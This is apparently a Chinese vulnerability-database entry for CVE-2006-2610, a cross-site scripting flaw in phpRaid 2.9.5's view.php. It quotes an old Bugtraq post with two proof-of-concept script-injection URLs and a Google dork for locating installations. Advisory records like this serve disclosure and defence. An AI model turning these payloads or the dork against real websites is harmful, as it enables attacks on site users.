PHPRaid View.PHP 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194860 漏洞类型 跨站脚本
发布时间 2006-05-25 更新时间 2006-05-26
CVE编号 CVE-2006-2610 CNNVD-ID CNNVD-200605-484
漏洞平台 N/A CVSS评分 2.6
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050156
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-484
|漏洞详情
phpRaid2.9.5中的view.php存在跨站脚本攻击(XSS)漏洞。远程攻击者可以借助(1)URL查询字符串和(2)Sort参数,注入任意Web脚本或HTML。
|漏洞EXP
phpRaid "view.php" XSS Vulnerability

Script : phpRaid
Script Website : http://www.spiffyjr.com/
Version : phpRaid v2.9.5

This Xss Works On phpRaid

Exploit ;

1-) 
Http://www.example.com/phpRaid/view.php?<script>alert('Xss%20Vulnerabili
ty');</script>

2-) 
Http://www.example.com/phpRaid/view.php?mode=view&raid_id=6&Sort=><scrip
t>var%20Xss_Vulnerability=31033031;alert(Xss_Vulnerability);</script>

Google Dorks : inurl:"phpRaid"

TeufeL // Netkabus.Com Research And Develop Group

_________________________________________________________________
Real-time chat with your friends - Free download - MSN Messenger  
http://messenger.msn.com/?mkt=tr
|参考资料

来源:BID
名称:18042
链接:http://www.securityfocus.com/bid/18042
来源:BUGTRAQ
名称:20060519phpRaid"view.php"XSSVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/434736/100/0/threaded
来源:XF
名称:phpraid-view-xss(26599)
链接:http://xforce.iss.net/xforce/xfdb/26599
来源:SREASON
名称:962
链接:http://securityreason.com/securityalert/962